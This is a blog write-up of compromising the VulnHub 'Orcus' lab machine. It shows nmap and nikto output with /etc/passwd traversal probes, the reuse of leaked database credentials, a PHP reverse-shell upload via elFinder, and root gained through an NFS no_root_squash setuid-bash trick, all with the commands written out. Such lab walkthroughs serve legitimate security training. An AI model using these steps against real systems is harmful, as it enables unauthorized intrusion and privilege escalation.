Enough with the philosophical yadda yaddah.
First I fired up nmap and as in the previous series gazillion services were running.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# nmap -sT -A -PO 172.16.94.136 | |
| Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-20 14:13 EDT | |
| Nmap scan report for 172.16.94.136 | |
| Host is up (0.0055s latency). | |
| Not shown: 988 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA) | |
| |_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA) | |
| 53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu | |
| | dns-nsid: | |
| |_ bind.version: 9.10.3-P4-Ubuntu | |
| 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | |
| | http-robots.txt: 30 disallowed entries (15 shown) | |
| | /exponent.js.php /exponent.js2.php /exponent.php | |
| | /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php | |
| | /exponent_version.php /getswversion.php /login.php /overrides.php | |
| | /popup.php /selector.php /site_rss.php /source_selector.php | |
| |_/thumb.php | |
| |_http-server-header: Apache/2.4.18 (Ubuntu) | |
| |_http-title: Site doesn't have a title (text/html). | |
| 110/tcp open pop3 Dovecot pop3d | |
| |_pop3-capabilities: TOP STLS CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING | |
| | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | |
| | Not valid before: 2016-10-09T03:44:10 | |
| |_Not valid after: 2026-10-09T03:44:10 | |
| |_ssl-date: ERROR: Script execution failed (use -d to debug) | |
| 111/tcp open rpcbind 2-4 (RPC #100000) | |
| | rpcinfo: | |
| | program version port/proto service | |
| | 100000 2,3,4 111/tcp rpcbind | |
| | 100000 2,3,4 111/udp rpcbind | |
| | 100003 2,3,4 2049/tcp nfs | |
| | 100003 2,3,4 2049/udp nfs | |
| | 100005 1,2,3 50518/udp mountd | |
| | 100005 1,2,3 58138/tcp mountd | |
| | 100021 1,3,4 33074/tcp nlockmgr | |
| | 100021 1,3,4 56493/udp nlockmgr | |
| | 100227 2,3 2049/tcp nfs_acl | |
| |_ 100227 2,3 2049/udp nfs_acl | |
| 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) | |
| 143/tcp open imap Dovecot imapd | |
| |_imap-capabilities: ENABLE IMAP4rev1 more have post-login IDLE ID SASL-IR listed capabilities STARTTLS OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS LITERAL+ | |
| | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | |
| | Not valid before: 2016-10-09T03:44:10 | |
| |_Not valid after: 2026-10-09T03:44:10 | |
| |_ssl-date: ERROR: Script execution failed (use -d to debug) | |
| 443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA) | |
| |_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA) | |
| 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) | |
| 993/tcp open ssl/imap Dovecot imapd | |
| | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | |
| | Not valid before: 2016-10-09T03:44:10 | |
| |_Not valid after: 2026-10-09T03:44:10 | |
| |_ssl-date: TLS randomness does not represent time | |
| 995/tcp open ssl/pop3 Dovecot pop3d | |
| |_pop3-capabilities: TOP USER CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL PIPELINING | |
| | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | |
| | Not valid before: 2016-10-09T03:44:10 | |
| |_Not valid after: 2026-10-09T03:44:10 | |
| |_ssl-date: ERROR: Script execution failed (use -d to debug) | |
| 2049/tcp open nfs_acl 2-3 (RPC #100227) | |
| MAC Address: 00:0C:29:74:06:F8 (VMware) | |
| Device type: general purpose | |
| Running: Linux 3.X|4.X | |
| OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 | |
| OS details: Linux 3.2 - 4.6 | |
| Network Distance: 1 hop | |
| Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
| Host script results: | |
| |_clock-skew: mean: 2h59m23s, deviation: 0s, median: 2h59m23s | |
| |_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | |
| | smb-os-discovery: | |
| | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | |
| | Computer name: \x00 | |
| | NetBIOS computer name: ORCUS\x00 | |
| | Workgroup: WORKGROUP\x00 | |
| |_ System time: 2017-03-20T17:14:14-04:00 | |
| | smb-security-mode: | |
| | account_used: guest | |
| | authentication_level: user | |
| | challenge_response: supported | |
| |_ message_signing: disabled (dangerous, but default) | |
| |_smbv2-enabled: Server supports SMBv2 protocol | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 5.48 ms 172.16.94.136 | |
| OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
| Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds |
I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and webapps to follow up. I also fired up dirb to see if i could find any extra folders.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# nikto -h http://172.16.94.136 | |
| - Nikto v2.1.6 | |
| --------------------------------------------------------------------------- | |
| + Target IP: 172.16.94.136 | |
| + Target Hostname: 172.16.94.136 | |
| + Target Port: 80 | |
| + Start Time: 2017-03-20 14:16:42 (GMT-4) | |
| --------------------------------------------------------------------------- | |
| + Server: Apache/2.4.18 (Ubuntu) | |
| + Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa | |
| + The anti-clickjacking X-Frame-Options header is not present. | |
| + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
| + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
| + Cookie PHPSESSID created without the httponly flag | |
| + No CGI Directories found (use '-C all' to force check all possible dirs) | |
| + Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500) | |
| + Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302) | |
| + Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302) | |
| + Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302) | |
| + Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + OSVDB-3268: /files/: Directory indexing found. | |
| + Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + OSVDB-3268: /tmp/: Directory indexing found. | |
| + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200) | |
| + "robots.txt" contains 30 entries which should be manually viewed. | |
| + Multiple index files found: /index.html, /index.php | |
| + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS | |
| + OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server. | |
| + OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem. | |
| + /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php) | |
| + OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem. | |
| + OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval. | |
| + OSVDB-3092: /admin/: This might be interesting... | |
| + OSVDB-3092: /files/: This might be interesting... | |
| + Uncommon header 'x-ob_mode' found, with contents: 1 | |
| + OSVDB-3092: /tmp/: This might be interesting... | |
| + OSVDB-3092: : This might be interesting... possibly a system shell found. | |
| + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner. | |
| + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found. | |
| + OSVDB-3233: /icons/README: Apache default file found. | |
| + OSVDB-3092: /test.php: This might be interesting... | |
| + /phpmyadmin/: phpMyAdmin directory found | |
| + 9338 requests: 0 error(s) and 48 item(s) reported on remote host | |
| + End Time: 2017-03-20 14:17:09 (GMT-4) (27 seconds) | |
| --------------------------------------------------------------------------- | |
| + 1 host(s) tested |
There are so many seemingly vulnerable or actually vulnerable web apps especially in the /external/ directory I'll never know for sure so naturally I spent a long time here (so many wild goose chases).
At this URL http://172.16.94.136/backups/ I downloaded the SimplePHPQuiz-Backupz.tar.gz but didnt have the permissions to download the ssh-creds.bak. I some how already knew it wouldnt amount to much. I extracted the the folder and went to the configs folder and found database credentials.
<?php
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');
@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (mysqli_connect_error()){
echo "Could not connect to MySql. Please try again";
exit();
}
?>
With this I immediately went to the http://172.16.94.136/phpmyadmin/ and logged in. Boom!!Now we have credentials to phpmyadmin all that is left is write a shell using mysql browse to it then get a shell.....
except it didnt happen that way as the credentials didn't have write permission to the web root. It didnt even have FILE permissions. The VM is loaded with a few databases so I decided to try one by one to see if there were backends to other webapps that we hadnt got in the enumeration phase. We were thanked with the /zenphoto/ folder which was an app that was missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from the SimplePHPQuiz-Backupz.tar.gz and successfully installed it.
At this point the plan was to find a point to upload a webshell and get a reverse connection. I did this by
Go to Upload tab--> Click Files (elFinder)--> Zen photodata, Right click on the on the pane on the right, Click --> create new text and then copy everyones favorite php-reverse-shell
After copying it, right click edit and then change the file extension to php, then right click again and then click Open. (remember to have set up a netcat listener). Then we'll get a limited reverse-shell.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@Orcus:/tmp/rooter$ id | |
| id | |
| uid=33(www-data) gid=33(www-data) groups=33(www-data) | |
| www-data@Orcus:/tmp/rooter$ cd /var/www | |
| cd /var/www | |
| www-data@Orcus:/var/www$ ls | |
| ls | |
| 9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip | |
| a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip | |
| b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz | |
| flag.txt | |
| html | |
| zenphoto-zenphoto-1.4.10 | |
| www-data@Orcus:/var/www$ cd html | |
| cd html | |
| www-data@Orcus:/var/www/html$ ls | |
| ls | |
| ls: cannot open directory '.': Permission denied | |
| www-data@Orcus:/var/www$ cat flag.txt | |
| cat flag.txt | |
| 868c889965b7ada547fae81f922e45c4 | |
| www-data@Orcus:/var/www$ |
With the first flag in the bag let try and root on this box. It took me a while to root this box. I kept going away trying privilege escalation exploits. Until today morning I came back to my nmap scans and found this
2049/tcp open nfs_acl 2-3 (RPC #100227)
wonder why that didn't stick out to me in the first place. I quickly run showmount.
root@kali:/tmp# showmount -e 172.16.94.136 Export list for 172.16.94.136: /tmp *
I then checked /etc/exports file and found that the NFS shares were configured with no_root_squash
www-data@Orcus:/$ cat /etc/exports cat /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /tmp *(rw,no_root_squash)
On our kali box, we mount the partition
root@kali:~# rm -rf /mnt/orcus/ root@kali:~# mkdir /mnt/orcus root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus root@kali:~# touch /mnt/orcus/rooter root@kali:~# chmod 777 /mnt/orcus/rooterOn our limited shell on Orcus we copy our bash shell into our newly created world writable /tmp/rooter
www-data@Orcus:/$ cp /bin/bash /tmp/rooterwe head back to our Kali box and set the seguid bit on the /tmp/rooter file (shell)
root@kali:~# chmod 4777 /mnt/orcus/rooterwe head into the the /tmp folder and check to make sure the the bit has been set and then execute the rooter with the -p option in order to preserve the previleges which gets us root privileges. :-)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@Orcus:/$ ls -al | |
| total 1124 | |
| drwxrwxrwt 10 root root 4096 Mar 27 08:45 . | |
| drwxr-xr-x 24 root root 4096 Oct 30 23:05 .. | |
| drwxrwxrwt 2 root root 4096 Mar 27 08:36 .ICE-unix | |
| drwxrwxrwt 2 root root 4096 Mar 27 08:36 .Test-unix | |
| drwxrwxrwt 2 root root 4096 Mar 27 08:36 .X11-unix | |
| drwxrwxrwt 2 root root 4096 Mar 27 08:36 .XIM-unix | |
| drwxrwxrwt 2 root root 4096 Mar 27 08:36 .font-unix | |
| -rwsrwxrwx 1 root root 1109564 Mar 27 08:50 rooter | |
| drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-dovecot.service-YyhShT | |
| drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-systemd-timesyncd.service-ENaVWk | |
| drwx------ 2 root root 4096 Mar 27 08:36 vmware-root | |
| www-data@Orcus:/$ ./rooter -p | |
| id | |
| uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) | |
| cd /root | |
| ls | |
| flag.txt | |
| cat flag.txt | |
| 807307b49314f822985d0410de7d8bfe |
It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.
No comments:
Post a Comment